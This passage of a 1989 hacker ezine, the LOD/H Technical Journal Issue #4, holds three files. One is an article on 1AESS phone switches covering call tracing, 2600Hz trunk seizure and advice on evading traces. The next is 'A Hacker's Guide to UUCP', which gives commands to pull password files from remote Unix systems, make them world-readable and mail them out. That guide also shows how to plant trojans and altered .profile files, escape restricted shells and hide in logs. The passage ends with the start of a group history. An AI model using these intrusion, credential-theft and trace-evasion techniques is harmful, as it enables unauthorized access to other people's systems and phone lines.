At the end of this article you will find a list of the most frequently
seen Maintenance channel output messages and a brief description of their
meaning. You will also find a list of frequently used input messages.

There are other channels as well as back ups but the only ones to be
concerned with are Recent Change and SCC maint. These are the two channels
you will most likely want to get access to. The Maintenance channel doesn't
leave the C.O. and is used by switch engineers as the primary way of
controlling the switch. During off hours and weekends the control of the
switch is transferred to the SCC.

The SCC is a centrally located bureau that has up to 16 switches
reporting to it via their SCC maint. channel. The SCC has a mini computer
running SCCS that watches the output of all these switches for trouble
conditions that require immediate attention. The SCC personnel then have the
ability to input messages to that particular switch to try and correct the
problem. If necessary, someone will be dispatched to the C.O. to correct the
problem. I should also mention that the SCC mini, SCCS has dialups and access
to SCCS means access to all the switches connected to it. The level of access
however, may be dependent upon the privileges of the account you are using.

The Recent Change channels also connect to a centrally located bureau
referred to as the RCMAC. These bureaus are responsible for activating lines,
changing class of service etc. RCMAC has been automated to a large degree by
computer systems that log into COSMOS and look for pending orders. COSMOS is
basically an order placement and record keeping system for central office
equipment, but you should know that already, right? So this system, called
Work Manager running MIZAR logs into COSMOS, pulls orders requiring recent
change work, then in one batch several times a day, transmits the orders to
the appropriate switch via it's Recent Change Channel.

Testing of the switch is done by many different methods. Bell Labs has
developed a number of systems, many accomplishing the same functions. I will
only attempt to cover the ones I know fairly well.

The primary testing system is the trunk test panels located at the switch
itself. There are three and they all pretty much do the same thing, which is
to test trunk and line paths through the switch.

Trunk and Line Test Panel
Supplementary Trunk Test Panel
Manual Trunk Test Panel

MLT (Mechanized Loop Testing) is another popular one. This system is
often available through the LMOS data base and can give very specific
measurements of line levels and losses. The "TV Mask" is also popular giving
the user the ability to monitor lines via a call back number.

DAMT (Direct Access Mechanized Testing) is used by line repairmen to put
tone on numbers to help them find lines. This was previously done by Frame
personnel, so DAMT automated that task. DAMT can also monitor lines, but
unfortunately, the audio is scrambled in a manor that allows one only to tell
what type of signal is present on the line, or whether it is busy or not.

All of these testing systems have one thing in common: they access the
line through a "No Test Trunk". This is a switch which can drop in on a
specific path or line and connect it to the testing device. It depends on
the device connected to the trunk, but there is usually a noticeable "click"
heard on the tested line when the No Test Trunk drops in. Also the testing
devices I have mentioned here will seize the line, busying it out. This will
present problems when trying to monitor calls, as you would need to drop in
during the call. The No Test Trunk is also the method in which operator
consoles perform verifications and interrupts.


** INTEROFFICE SIGNALLING **

Calls coming into and leaving the switch are routed via trunks. The
switches select which trunk will route the call most effectively and then
retransmits the dialed number to the distant switch. There are several
different ways this is done. The two most common are Loop Signaling and CCIS,
Common Channel Interoffice Signaling. The predecessor to both of these is the
famous and almost extinct "SF Signaling". This utilized the presence of
2600hz to indicate trunks in use. If one winks 2600Hz down one of these
trunks, the distant switch would think you hung up. Remove the 2600, and you
have control of the trunk and you could then MF a number. This worked great
for years. Assuming you had dialed a toll free number to begin with, there
was no billing generated at all. The 1AESS does have a program called SIGI
that looks for any 2600 winks after the original connection of a toll call.
It then proceeds to record on AMA and output any MF digits received. For more
information on AMA see Phantom Phreaker's article entitled, Understanding
Automatic Message Accounting in the LOD/H TJ Issue #3. However due to many
long distant carriers using signaling that can generate these messages it is
often overlooked and "SIG IRR" output messages are quite common.

Loop signaling still uses MF to transmit the called number to distant
switches, however, the polarity of the voltage on the trunk is reversed to
indicate trunk use.

CCIS sometimes referred to CCS#6 uses a separate data link sending
packets of data containing information regarding outgoing calls. The distant
switch monitors the information and connects the correct trunk to the correct
path. This is a faster and more efficient way of call processing and is being
implemented everywhere. The protocol that AT&T uses is CCS7 and is currently
being accepted as the industry standard. CCS6 and CCS7 are somewhat similar.

Interoffice trunks are multiplexed together onto one pair. The standard
is 24 channels per pair. This is called T-1 in it's analog format and D-1
in its digital format. This is often referred to as carrier or CXR. The terms
frame error and phase jitter are part of this technology which is often a
world in itself. This type of transmission is effective for only a few miles
on twisted pair. It is often common to see interoffice repeaters in manholes
or special huts. Repeaters can also be found within C.O.s, amplifying trunks
between offices. This equipment is usually handled by the "carrier" room,
often located on another floor. Carrier also handles special circuits, private
lines, and foreign exchange circuits.

After a call reaches a Toll Switch, the transmit and receive paths of
the calling and called party are separated and transmitted on separate
channels. This allows better transmission results and allows more calls to
be placed on any given trunk. This is referred to as 4 wire switching. This
also explains why during a call, one person can hear crosstalk and the other
cannot. Crosstalk will bleed over from other channels onto the multiplexed
T-Carrier transmission lines used between switches.


** CALL TRACING

So with the Loop Signaling standard format there is no information being
transmitted regarding the calling number between switches. This therefore
causes the call tracing routine to be at least a two step process. This is
assuming that you are trying to trace an anticipated call, not one in
progress. When call trace "CLID" is placed on a number, a message is output
every time someone calls that number. The message shows up on most of the ESS
output channels and gives information regarding the time and the number of the
incoming trunk group. If the call came from within that office, then the
calling number is printed in the message. Once the trunk group is known, it
can usually be determined what C.O. the calls are coming from. This is also
assuming that the calls are coming from within that Bell company and not
through a long distance carrier (IEC). So if Bell knows what C.O. the calls
are coming from, they simply put the called number on the C.I. list of that
C.O. Anytime anyone in that C.O. calls the number in question another message
is generated showing all the pertinent information.

Now if this were a real time trace it would only require the assistance
of the SCC and a few commands sent to the appropriate switches (i.e.
NET-LINE). This would give them the path and trunk group numbers of the call
in progress. Naturally the more things the call is going through, the more
people that will need to be involved in the trace. There seems to be a common
misconception about the ability to trace a call through some of the larger
packet networks i.e. Telenet and TYMNET. Well I can assure you, they can
track a call through their network in seconds (assuming multiple systems
and/or network gateways are not used) and then all that is needed is the
cooperation of the Bell companies. Call tracing in itself it not that
difficult these days. What is difficult is getting the different organizations
together to cooperate. You have to be doing something relatively serious to
warrant tracing in most cases, however, not always. So if tracing is a
concern, I would recommend using as many different companies at one time as
you think is necessary, especially US Sprint, since they can't even bill
people on time much less trace a call. But...it is not recommended to call
Sprint direct, more on that in the Equal Access section.


** EQUAL ACCESS

The first thing you need to understand is that every IEC Inter Exchange
Carrier (long distance company) needs to have an agreement with every LEC
Local Exchange Carrier (your local phone company) that they want to have
access to and from. They have to pay the LEC for the type of service they
receive and the amount of trunks, and trunk use. The cost is high and the
market is a zoo. The LECs have the following options:

- Feature Group A -

This was the first access form offered to the IECs by the LECs. Basically
whenever you access an IEC by dialing a regular 7 digit number (POTS line)
this is FGA. The IECs' equipment would answer the line and interpret your
digits and route your call over their own network. Then they would pick up an
outgoing telephone line in the city you were calling and dial your number
locally. Basically a dial in, dial out situation similar to Telenet's
PC pursuit service.

- Feature Group B -

FGB is 950-xxxx. This is a very different setup from FGA. When you dial
950, your local switch routes the call to the closest Access Tandem (AT) (Toll
Switch) in your area. There the IECs have direct trunks connected between the
AT and their equipment. These trunks usually use a form of multiplexing like
T-1 carrier with wink start (2600Hz). On the incoming side, calls coming in
from the IEC are basically connected the same way. The IEC MFs into the AT
and the AT then connects the calls. There are many different ways FGB is
technically setup, but this is the most common.

Tracing on 950 calls has been an area of controversy and I would like to
clear it up. The answer is yes, it is possible. But like I mentioned earlier,
it would take considerable manpower which equals expensive to do this. It
also really depends on how the IEC interface is set up. Many IECs have
trunks going directly to Class 5 end offices. So, if you are using a small
IEC, and they figure out what C.O. you are calling from, it wouldn't be out
of the question to put CLID on the 950 number. This is highly unlikely and I
have not heard from reliable sources of it ever being done. Remember, CLID
generates a message every time a call is placed to that number. Excessive
call trace messages can crash a switch. However, I should mention that brute
force hacking of 950s is easily detected and relatively easy to trace. If the
IEC is really having a problem in a particular area they will pursue it.

- Feature Group C -

FGC is reserved for and used exclusively by AT&T.

- Feature Group D -
FGD is similar to FGB with the exception that ANI is MF'ed to the IEC.
The end office switch must have Equal Access capability in order to transmit
the ANI. Anything above a X-bar can have it. FGD can only be implemented on
800 numbers and if an IEC wants it, they have to buy the whole prefix. For a
list of FGD prefixes see 2600 Magazine. You should also be aware that MCI,
Sprint, and AT&T are offering a service where they will transmit the ANI to
the customer as well. You will find this being used as a security or
marketing tool by an increasing amount of companies. A good example would be
800-999-CHAT.


** OUTPUT MESSAGES **

The following is a compiled list of common switch messages. The list was
compiled from various reference materials that I have at my disposal.


1AESS COMMON OUTPUT MESSAGES
--------------------------------------

MSG. DESCRIPTION
----------------------------------------------------------------
** ALARM **

AR01 Office alarm
AR02 Alarm retired or transferred
AR03 Fuse blown
AR04 Unknown alarm scan point activated
AR05 Commercial power failure
AR06 Switchroom alarm via alarm grid
AR07 Power plant alarm
AR08 Alarm circuit battery loss
AR09 AMA bus fuse blown
AR10 Alarm configuration has been changed (retired,inhibited)
AR11 Power converter trouble
AR13 Carrier group alarm
AR15 Hourly report on building and power alarms

** AUTOMATIC TRUNK TEST **
AT01 Results of trunk test

** CARRIER GROUP **
CG01 Carrier group in alarm
CG03 Reason for above

** COIN PHONE **
CN02 List of pay phones with coin disposal problems
CN03 Possible Trouble
CN04 Phone taken out of restored service because of possible coin fraud

** COPY **
COPY Data copied from one address to another

** CALL TRACE **
CT01 Manually requested trace line to line, information follows
CT02 Manually requested trace line to trunk, information follows
CT03 Intraoffice call placed to a number with CLID
CT04 Interoffice call placed to a number with CLID
CT05 Call placed to number on the CI list
CT06 Contents of the CI list
CT07 ACD related trace
CT08 ACD related trace
CT09 ACD related trace

** DIGITAL CARRIER TRUNK **
DCT COUNTS Count of T carrier errors

** MEMORY DIAGNOSTICS **
DGN Memory failure in cs/ps diagnostic program

** DIGITAL CARRIER "FRAME" ERRORS **
FM01 DCT alarm activated or retired
FM02 Possible failure of entire bank not just frame
FM03 Error rate of specified digroup
FM04 Digroup out of frame more than indicated
FM05 Operation or release of the loop terminal relay
FM06 Result of digroup circuit diagnostics
FM07 Carrier group alarm status of specific group
FM08 Carrier group alarm count for digroup
FM09 Hourly report of carrier group alarms
FM10 Public switched digital capacity failure
FM11 PUC counts of carrier group errors

** MAINTENANCE **
MA02 Status requested, print out of MACII scratch pad
MA03 Hourly report of system circuits and units in trouble
MA04 Reports condition of system
MA05 Maintenance interrupt count for last hour
MA06 Scanners,network and signal distributors in trouble
MA07 Successful switch of duplicated unit (program store etc.)
MA08 Excessive error rate of named unit
MA09 Power should not be removed from named unit
MA10 OK to remove paper
MA11 Power manually removed from unit
MA12 Power restored to unit
MA13 Indicates central control active
MA15 Hourly report of # of times interrupt recovery program acted
MA17 Centrex data link power removed
MA21 Reports action taken on MAC-REX command
MA23 4 minute report, emergency action phase triggers are inhibited

** MEMORY **
MN02 List of circuits in trouble in memory

** NETWORK TROUBLE **
NT01 Network frame unable to switch off line after fault detection
NT02 Network path trouble Trunk to Line
NT03 Network path trouble Line to Line
NT04 Network path trouble Trunk to Trunk
NT06 Hourly report of network frames made busy
NT10 Network path failed to restore

** OPERATING SYSTEM STATUS **
OP:APS-0
OP:APSTATUS
OP:CHAN
OP:CISRC Source of critical alarm, automatic every 15 minutes
OP:CSSTATUS Call store status
OP:DUSTATUS Data unit status
OP:ERAPDATA Error analysis database output
OP:INHINT Hourly report of inhibited devices
OP:LIBSTAT List of active library programs
OP:OOSUNITS Units out of service
OP:PSSTATUS Program store status

** PLANT MEASUREMENTS **
PM01 Daily report
PM02 Monthly report
PM03 Response to a request for a specific section of report
PM04 Daily summary of IC/IEC irregularities

** REPORT **
REPT:ADS FUNCTION Reports that a ADS function is about to occur
REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
REPT:ADS PROCEDURAL ERROR You fucked up
REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
REPT:PROG CONT OFF-NORMAL System programs that are off or on
REPT:RC CENSUS Hourly report on recent changes
REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited)

** RECENT CHANGE **
RC18 RC message response

** REMOVE **
RMV Removed from service

** RESTORE **
RST Restored to service status

** RINGING AND TONE PLANT **
RT04 Status of monitors

** SOFTWARE AUDIT **
SA01 Call store memory audit results
SA03 Call store memory audit results

** SIGNAL IRREGULARITY **
SIG IRR Blue box detection
SIG IRR INHIBITED Detector off
SIG IRR TRAF Half hour report of traffic data

** TRAFFIC CONDITION **
TC15 Reports overall traffic condition
TL02 Reason test position test was denied
TL03 Same as above

** TRUNK NETWORK **
TN01 Trunk diagnostic found trouble
TN02 Dial tone delay alarm failure
TN04 Trunk diag request from test panel
TN05 Trunk test procedural report or denials
TN06 Trunk state change
TN07 Response to a trunk type and status request
TN08 Failed incoming or outgoing call
TN09 Network relay failures
TN10 Response to TRK-LIST input, usually a request from test position
TN11 Hourly, status of trunk undergoing tests
TN16 Daily summary of precut trunk groups

** TRAFFIC OVERLOAD CONDITION **
TOC01 Ser

  
ious traffic condition
TOC02 Reports status of less serious overload conditions

** TRANSLATION ** (shows class of service, calling features etc.)
TR01 Translation information, response to VFY-DN
TR03 Translation information, response to VFY-LEN
TR75 Translation information, response to VF:DNSVY
** **
TW02 Dump of octal contents of memory



1AESS COMMON INPUT MESSAGES
-------------------------------------

Messages always terminate with ". ctrl d " x=number or trunk network #


MSG. DESCRIPTION
------------------------------------------------------------------------
NET-LINE-xxxxxxx0000 Trace of path through switch
NET-TNN-xxxxxx Same as above for trunk trace
T-DN-MBxxxxxxx Makes a # busy
TR-DEACTT-26xxxxxxx Deactivates call forwarding
VFY-DNxxxxxxx Displays class of service, calling features etc.
VFY-LENxxxxxxxx Same as above for OE
VFY-LIST-09 xxxxxxx Displays speed calling 8 list


************************************************************************

There are many things I didn't cover in this article and many of the
things I covered, I did so very briefly. My intention was to write an article
that explains the big picture, how everything fits together. I hope I helped.

Special thanks to all the stupid people, for without them some of us
wouldn't be so smart and might have to work for a living. Also all the usual
Bell Labs, AT&T bla bla bla etc. etc.

I can usually be reached on any respectable board, ha!


Agent Steal Inner (C)ircle 1989

!!!!!

!!!!! FREE KEVIN MITNICK !!!!!

!!!!!

[End Of Article]

The LOD/H Technical Journal, Issue #4: File 05 of 10


=====================================================
|| ||
|| A Hacker's Guide to UUCP ||
|| ||
|| by ||
|| ||
|| The Mentor ||
|| ||
|| Legion of Doom/Hackers ||
|| ||
|| 08/04/89 ||
|| ||
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

Scope
DDDDD

Part I of this file is intended for the casual hacker- someone
familiar with UNIX commands, but who hasn't had extended experience
with the UUCP network. Part II will be intended for the advanced
hacker who has the confidence and knowledge to go out and modify
a UNIX network- the logs, the paths, the permissions, etc...


Introduction
DDDDDDDDDDDD

Like it or not, UNIX is the most popular operating system in the
world. As a hacker, you are likely to run into several hundred
UNIX machines over the course of your hacking career. Knowing how
to move around and use the UNIX environment should be considered
absolutely essential, especially since UNIX is the operating system
of choice among phone company computers.

This article is not an attempt to teach you how to use UNIX.
If you don't know what a '$ls -x > dir' does, you need to put this
article in your archives, get a good basic file on UNIX (or buy a
book on it- there are several good ones out ((see the Bibliography
at the end of this file for suggestions))), read it, and then play
around some in a UNIX machine. Please! If you have managed to
stumble into a Bell system, do *not* use it as a machine to learn
UNIX on! You *will* get noticed by security, and this will lead
not only to the security being tightened, but may well lead to Bell
Security going through your underwear drawer.

The information in this article is mainly concerning AT&T System
V UNIX. I have included BSD 4.3 & Xenix information also in cases
that I was able to determine alternate procedures. All information
has been thoroughly tested and researched on as many machines as
possible. Standard disclaimer, your system may be slightly
different.

Glossary & Usage
DDDDDDDDDDDDDDDD

BNU - Basic Networking Utilities. System V.3's uucp package.
daemon - A program running in the background.
LAN - Local Area Network.
network - A group of machines set up to exchange information and/or
resources.
node - A terminating machine on a network.
UUCP - When capitalized, refers to the UNIX networking utilities
package.
uucp - In lower case, refers to the program Unix-to-Unix-CoPy.

I. General Information
DDDDDDDDDDDDDDDDDDD

A. What is UUCP?

UUCP is a networking facility for the UNIX operating system.
It is made up of a number of different programs that allow UNIX
machines to talk to each other. Using UUCP, you can access a
remote machine to copy files, execute commands, use resources, or
send mail. You can dial out to other non-UNIX computers, and you
can access public mail/news networks such as USENET.

B. History of UUCP

The first UUCP system was built in 1976 by Mike Lest at AT&T
Bell Labs. This system became so popular that a second version was
developed by Lesk, David Nowitz, and Greg Chesson. Version 2 UUCP
was distributed with UNIX Version 7.

With System V Release 3, a new version of UUCP that was
developed in 1983 by Peter Honeyman, David A. Nowitz, and Brian E.
Redman. This version is known as either HoneyDanBer UUCP (from the
last names of the developers), or more conventionally as Basic
Networking Utilities (BNU). I will stick with BNU, as it is easier
to type. BNU is backward compatible with Version 2, so there is
no problem communicating between the two.

BSD 4.3's UUCP release incorporates some of the BNU features,
but retains more similarity to Version 2 UUCP.

If you are unsure about which version of UUCP is on the system
that you are in, do a directory of /usr/lib/uucp and look at the
files. If you have a file called L.sys, you are in a Version 2
system. If there is a file called Systems, then it's BNU. See
Table 1 for a fairly complete listing of what system runs what UUCP
version.


Table 1*
DDDDDDD
Manufacturer Model UNIX/UUCP Version

_____________________________________________________________
| | | |
| Apollo | 3000 Series (Domain) | BSD 4.2/Version 2|
| Altos | All models | Xenix/Version 2 |
| AT&T | 3B1 (UNIX PC) | System V.2/Vers.2|
| AT&T | 3B2 | System V.3/BNU |
| AT&T | 3B15 | System V.3/BNU |
| Convergent | Miniframe (CTIX) | System V.2/Vers.2|
| Technologies | Mightframe (CTIX) | System V.3/BNU |
| DEC | MicroVAX | Ultrix/Vers. 2 + |
| DEC | VAX | BSD 4.3/Vers. 2 +|
| Encore | Multimax | System V.3/BNU |
| IBM | PC-RT (AIX) | System V.2/Vers.2|
| Masscomp | MC-5000 Series | System V.3/BNU |
| Microport | PC/AT | System V.2/Vers.2|
| NCR | Tower 32/16 | System V.2/Vers.2|
| Prime | EXL Series | System V.2/Vers.2|
| Pyramid | 90x | BSD 4.2/Version 2|
| SCO/Xenix | PC/XT | System V.2/Vers.2|
| Unisys | 5000 & 7000 Series | System V.2/Vers.2|
| | | |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
* This table is slightly outdated. Some of the systems may have
upgraded since this article was written.


II. UUCP Communications
DDDDDDDDDDDDDDDDDDD

A. Overview of UUCP User Programs

There are a number of programs that are used by a UUCP
communication network. Some are standard UNIX programs, others are
exclusively part of the UUCP package.
.................................................................

These three are standard UNIX commands:

mail- UNIX's mail facility can be used to send messages
to other systems on a UUCP network.
cu- Connects you to a remote machine and allows you to
be logged in simultaneously to both machines. Also
allows you execute commands on either machine
without dropping the link.
tip- (BSD) same as cu.

+++

There are five main programs within UUCP:

uucp- Does all the setup for a remote file transfer.
uucp creates files that describe the file transfer
(called 'work' files), then calls the uucico daemon
to do the actual work.
uux- Used to execute commands on a remote machine. uux
performs similar to uucp, except that commands are
processed instead of files.
uuname- Used to list the names of other systems that are
connected to your network.
uulog- Displays the uucp log for the specified machine.
I'll be showing how to cover your uucp tracks from
this later in the article.
uustat- Gets the status of uux requests. Also lets you
manipulate the contents of a UUCP queue.

+++

System V also has two additional programs:

uuto- Allows you to send files to another user similar
to the UNIX mail command.
uupick- Allows you to read files sent to you with uuto.

+++

BSD 4.3 has two additional programs:

uuq- Lets you view & manipulate UUCP jobs that are
waiting to be processed, similar to System V's
uupick program.
uusend- Lets you forward files through a string of systems.
..................................................................

III. Using the Programs
DDDDDDDDDDDDDDDDDD

A. uuname

This one is easy & friendly. All you do is type '$uuname'.
It will spit out a list of all systems on your network. If you
aren't sure about the name of your local system, invoke uuname with
the -l option. ($uuname -l).

B. mail

I'm not going to say to much about mail, as it isn't a program
that you will use much as a hacker except possibly to break out of
a shell. Sending mail to other people is not a good way to stay
hidden, as all mail transfer to remote systems is logged (no, they
may not read the mail, but they're likely to notice that the
unassigned ADMIN account is suddenly getting mail from all over the
world...) These logs can be modified, however. This will
be covered in Part II.

Briefly, mail is invoked with the command 'mail username' (or
mailx under some systems). If you wish to send mail to user john
on the system you're on, you would type:

mail john
Dear John-
This is mail. Enjoy it.
^D (usage note, this means control-D)

To send mail to a user on a remote system, or a string of
systems, you would use the ! key to indicate a remote system name.
If you were on node Alpha and wanted to send mail to john on node
Beta, you would address your mail to 'mail Beta!john'. If you
wanted to send mail to a user on system that's not connected to
yours, but *is* connected to a machine you are connected to, you
would string together the system names, separated by a !. For
example, if node Saturn was connected to Beta, but not to Alpha,
you could send mail to susan on Saturn with 'mail Beta!Saturn!susan'.

Please note- If you are running the C-Shell or Bourne Shell,
you will have to prefix the ! with a X. i.e. 'mail BetaX!SaturnX!susan'.
Also, the mail header displays the system name, return path, and account
name that you send mail from, so don't try to anonymously mail someone
a message- it won't work.

Another quick feature (this is under the 'basic unix
knowledge' category), if you want to mail a file named 'message'
to someone, you'd type the following - '$mail Beta!Saturn!susan <
message'.

Finally, as mentioned above, it may be possible to break out
of a restricted shell within mail. Simply send mail to yourself,
then when you enter mail to read the message, type !sh to exit from
mail into shell. This will often blow off the restricted shell.


C. File Transfer

One of the first things that you will want to do when you
discover that you're on a network (uuname, remember?) is to grab
a copy of the /etc/password file from the systems on the net then
run Shooting Shark's password hacking program from TJ Issue #2.
Even if you have no use for it now, save it & label it, you never
know when you might need to get into that system. Besides, when
printed, they make fun & interesting wallpaper.

Unfortunately, the /etc/ directory will sometimes have access
restricted. You can get around this by copying the /etc/password
file to the /usr/spool/uucppublic directory using the uux command
(see below). If the uux program has restrictions on in, then you
may have to actually hack into the remote system using the rlogin
command. Be persistent.

UUCP is also useful in that it allows you to send a file from
your system to a remote system. Got a nice little trojan you need
to insert on their system? Use UUCP to drop it into the /bin/
directory. Or if they protected the /bin/ directory (likely, if
they have half a brain), they might have forgotten to protect all
of the users private directories (i.e. /usr/mike or /usr/susan or
sometimes even /usr/admin). UUCP a copy of a .profile file to your
system, insert your own stuff in it, then UUCP it back to its
original directory where the user will access it the next time he
logs in. People rarely $cat their .profile file, so you can
usually get away with murder in them.

While uucp has some limitations, it has the advantage of being
present on every UUCP system in the world. If you're on a System
V, you will probably use uuto & uupick much more frequently, as
it's easier to do subtle hacks with them. But if uucp is all you
have, remember, you're a hacker. Show some ingenuity. The syntax
of uucp when sending a file is:

$uucp [options] <local source> <remote destination>

For example, you have a program sitting in your working
directory on node Alpha called 'stuff', and you want to plop it
into the /usr/spool/uucppublic/mike/ directory of node Beta. The
command would be '$uucp stuff Beta!/usr/spool/uucppublic/mike/'.
(Don't forget to add a slash in front of the exclamation point if
you're in C-Shell or Bourne!) A good thing to know that will save
you some typing is that the /usr/spool/uucppublic/ directory can
be abbreviated as D/ (in KSH only), so that the above command could look
like '$uucp stuff Beta!D/mike/'. You can also specify a path other than
D/. If you wish to drop your 'new & improved' version of the
/etc/password file into the /etc/ directory, you could do a '$uucp
password Beta!/etc/'. Just don't be surprised if it gets bounced
with a message similar to the following:

From uucp Sat Dec 24 23:13:15 1988
Received: by Beta.UUCP (2.15/3.3)
id AA25032; Sat Dec 24 23:13:15 edt
Date: Sat Dec 24 23:13:15 edt
From: uucp
Apparently to: hacker
Status: R

file /etc/password, system Beta
remote access to path/file denied

Another hacker-friendly feature of UUCP is the ability to copy
something into a remote user's login directory by entering a D
character before the username. For example, to dump a modified
.profile file into a user on Beta named alex, you would do the
following:


'$uucp .profile Beta!Dalex'

The syntax for uucp when receiving a remote file is:

$uucp [options] <remote path> <local directory>

For example, you wish to grab Beta's password file and put it in
a subdirectory called tmp in the account 'hacker' on node Alpha.
The command would be:

'$uucp Beta!/etc/password Alpha!/usr/hacker/tmp/'.

The same things concerning use of tildes (D) demonstrated in
sending files applies when receiving them. The following table
contains valid options to the uucp command.


Table 2
DDDDDDD
_________________________________________________
| |
| -C Copy the local source file to the spool |
| directory before attempting the trans- |
| fer. |
| |
| -f If the directory doesn't exist, abort the |
| transfer. Normally uucp will create any |
| non-existent directories, which is bad |
| technique if you're a good hacker... |
| |
| -j Display the UUCP job request number. This |
| is useful if you're going to use uustat |
| to manipulate & reroute UUCP requests in |
| the queue. |
| |
| -m Notify sender by mail when copy is done. |
| Potentially hazardous, as incoming mail |
| is logged. Later on I'll show how to |
| modify that log... |
| |
| -n<username> Notify the user specified on |
| the remote system when the xfer is done. |
| I assume everyone sees how foolish this |
| would be, right? |
| |
| -r Queue the job, but do not contact remote |
| system immediately. Can't see any pros |
| or cons in using this one... |
| |
| -s<filename> Pipe the UUCP status messages |
| to filename. Useful if you wish to log |
| off & then check the progress later. |
| |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

D. Executing Remote Commands

The uux program allows users to execute a program on another
system on the network. While in theory this is the most useful
command a hacker can use, in practice it is usually heavily
restricted- any system administrator with half a brain realizes
that letting people execute any command they like from across the
country is not the way to maintain system integrity.

There are, however, some useful things that can be done with
uux even if the sysadmin has protected the things that *he* thinks
are dangerous (remember, he's not a hacker, you are. You are
smarter, more persistent, and much cleverer than he is. He doesn't
like coming to work every day, can't wait to leave, and will do the
minimum possible to get by. You're different. You're dedicated &
tricky. You *like* what you're doing. If you don't, get the hell
out & let others who do take over. End of the pep talk.)

The format for the uux command is:

$uux [options] command-string.

See Table 3 below for a list of options.

Ok, ideal case. The System manager of Beta is an idiot who
has left all possible commands open, and the uucico daemon has root
privs. Let's say you want to alter the protection of the password
file, copy it into the D/ (public, remember?) directory, then copy
it over to your system. The sequence of commands would be:

$uux Beta!chmod 777 /etc/password
$uux Beta!cp /etc/password /usr/spool/uucppublic/info.txt
$uucp Beta!D/info.txt /usr/hacker/

The first line would modify the protection where anyone could
get to it, the second line would copy it into the D/ directory, and
the third line would send it along to you.

Unfortunately, most commands are disabled (useful ones like
chmod and cat and ls, at least.) But sometimes you can get around
that. For instance, often you might not be able to ls or cp the
password file. But very rarely will mail be disabled. So if you
wanted a copy of the password file, you have them mail you one:

$uux Beta!mail Alpha!hacker < /etc/password

Later in the UUCP Administration section, I'll explain how to
modify the remote system so any command you want is executable.

When you execute a remote command, UUCP will automatically
send you mail telling you how it went. It's a good idea to check
the logs and see if there's anything you need to remove to cover
your presence (this subject will be covered in Part II).

If you are executing a command that is going to need data from
a file, you specify that the file is on your local system by
prefacing it with a X!. I can't think of many reasons to use this,
but perhaps you can. As an example, let's say you wanted to print
a file in your directory called 'stuff' out on a remote laser
printer (bad hacking practice, and difficult to retrieve.) Do this:

$uux Beta!lp -dlaser X!stuff

If the command you want to execute (whodo in this example) is
forbidden, you will get a notification message similar to the
following:

>From uucp Sat Dec 24 23:12:15 EDT 1988
>From uucp Sat Dec 24 23:12:13 EDT 1988 remote from Beta
Status: R0
uuxqt cmd (whodo) status (DENIED)

If you are going to need the standard output for a command,
pipe it into D/. And any files or processes created by uux will
belong to the user uucp, not to you.

Table 3
DDDDDDD
__________________________________________________________
| |
| -a<username> Notify user username when completed. |
| |
| -b Print the Standard Input when the exit status |
| indicates an error. |
| |
| -c Do not copy files to the spool directory (I |
| recommend this one...too big a chance of someone |
| glancing in the spool dir. |
| |
| -g<char or num> Sets the priority of the transfer. |
| The lower alphabetically or numerically that |
| the char or num is, the faster the process will |
| be executed. i.e. -ga or -g2 will go faster |
| than -gr or -g8. |
| |
| -j Print the UUCP job number. Useful if you're |
| going to be playing with the queue. |
| |
| -I (BSD Only) Make a link from the original file to |
| the spool dir. I'm not sure what this is for. |
| |
| -L (BSD Only) Start up the uucico daemon. |
| |
| -n Don't notify by mail. Recommended if you don't |
| have the authority or knowledge to modify the |
| system mail logs. |
| |
| -p Use Standard Input |
| |
| -r Queue the job but don't start uucico. |
| |
| -s<filename> Send transfer status to file filename. |
| |
| -x<0..9> Set level of debugging information. |
| |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

E. uustat & uulog

These two programs are used to track UUCP jobs and examine
their status.

uustat prints out a one-line summary for each job, telling you
if the job is finished or the job is queued. Older versions of
uustat will have the job state as either JOB DELETED or JOB IS
QUEUED. The output of uustat will look like the following:

$uustat

1001 hacker Alpha 10/31-09:45 10/31-10:15 JOB IS QUEUED
1002 hacker Alpha 10/30-08:15 10/30-11:25 COPY FINISHED
| | | | | |
| | | | | |
job # user node start-time status-time job-status

See Table 4 for a list of options for the uustat command.

uulog is a more thorough version of uustat, as it tracks the
status messages logged by the system as your job proceeded through
the system. See Table 5 for options of the uulog command.

Table 4*
DDDDDDD
_________________________________________________
| |
| -a report all queued jobs. |
| |
| -k<job#> kill job # job#. |
| |
| -m report if another system is accessible. |
| |
| -q report the number of jobs queued for |
| all systems on the net. |
| |
| -s<system> report the status of jobs for |
| the system named systemname. |
| |
| -u<username> report the status of jobs for |
| user username. |
| |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
* There are several other options such as -o and
-y that are system specific, and aren't really
that useful to begin with.


Table 5
DDDDDDD
______________________________
| |
| -s<system> same as uustat |
| |
| -u<userid> same as uustat |
| |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

******************************************************************

This marks the end of Part I. If time permits a Part II will be in
the next LOD/H Technical Journal.

(c) 1989 The Mentor
Legion of Doom/Legion of Hackers

******************************************************************


The LOD/H Technical Journal, Issue #4: File 06 of 10.


The History of LOD/H
Revision #3 May 1990
written by Lex Luthor


NOTES: I approximated all dates, as my records are not totally complete.
If I left anyone out or put someone in that shouldn't be in, sorry I
tried and did spend considerable time researching the dates and
BBS files, the old LOD BBS software, etc. Revisions one and two were
released to LOD/H members only. Some information may only be relevant
to those who were around at the time.


The primary purpose of this article is simply to present an accurate
picture of events and people who have been associated with this group. The
reputation of many groups and many people have been tainted by slanderous
remarks made by uninformed law enforcement and justice department personnel,
the media, and other hackers. I find this sad, but it's a fact of life that
must be endured. All that can be done in this article is to attempt to present
the facts as I see them. Due to the wild and unfounded accusations by said
persons, today LOD is viewed more as malicious criminals than as for what it
was viewed as in the past. That is, of a group of people who put themselves at
risk to help inform others. Of course this is a prettier picture than most
want to believe, and is slightly prettier than what it is in actuality, but
